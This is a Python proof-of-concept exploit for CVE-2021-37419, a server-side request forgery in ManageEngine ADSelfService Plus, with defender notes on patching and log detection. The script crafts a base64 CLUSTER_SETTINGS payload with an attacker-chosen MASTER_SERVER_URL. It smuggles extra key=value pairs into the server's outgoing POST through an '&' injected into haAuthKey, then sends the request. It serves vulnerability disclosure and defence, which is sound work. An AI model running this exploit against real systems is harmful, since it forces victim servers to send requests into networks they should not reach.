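#
# STM Cyber R&D
# https://blog.stmcyber.com
#
# Exploit Title: ManageEngine ADSelfService Plus - SSRF vulnerability in /servlet/ADSHACluster endpoint
# Exploit Author: Krzysztof Andrusiak, Marcin Ogorzelski
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: < 6112
# Tested on: Windows Server 2019
# CVE: CVE-2021-37419
#
# What this script does: sends one POST to /servlet/ADSHACluster whose query
# string names a "master server" URL. On affected builds this makes the
# ADSelfService Plus server issue its own POST to that URL (server-side
# request forgery).
#
# Defender notes:
#   * Builds before 6112 are listed as affected; update to 6112 or later.
#   * In web/proxy logs, look for requests to /servlet/ADSHACluster carrying
#     MTCALL=restart together with a CLUSTER_SETTINGS parameter, especially
#     from hosts that are not high-availability cluster peers.
#   * Base64-decode CLUSTER_SETTINGS from such log entries and inspect
#     MASTER_SERVER_URL; a value ending in '#' or naming a host outside the
#     HA cluster is suspicious.
#   * Restrict which hosts can reach this endpoint, and limit outbound
#     connections from the ADSelfService Plus server to the destinations
#     it actually needs.

import json
import base64

import requests

ADSSP_URL = "http://192.168.100.102:8888"  # ADSSP server URL
TARGET_URL = "https://192.168.100.101:8080/myOwnAPI"  # address to which POST request will be sent
PARAMS = "param1=test&param2=test"  # parameters which will be included in POST request body

# JSON object the endpoint receives (base64-encoded) as CLUSTER_SETTINGS.
cluster_settings = {
    # NOTE(review): the trailing '#' presumably turns anything the server
    # appends to this URL into a fragment, so it never reaches the target;
    # confirm against the vendor fix.
    "MASTER_SERVER_URL": TARGET_URL + "#",
    "HA_PRODUCT": None,
    "RESTART_SLAVE": True
}

# Query-string parameters of the request sent to ADSSP.
params = {
    "MTCALL": "restart",
    "CLUSTER_SETTINGS": base64.b64encode(json.dumps(cluster_settings).encode('utf-8')),
    # NOTE(review): the value embeds '&' plus further key=value pairs; the
    # server presumably copies haAuthKey into the outgoing POST body without
    # encoding it, which is how PARAMS ends up in that body. Server-side
    # validation/encoding of this parameter is the corresponding hardening.
    "haAuthKey": "1&" + PARAMS
}

requests.post(ADSSP_URL.rstrip('/') + '/servlet/ADSHACluster', params=params)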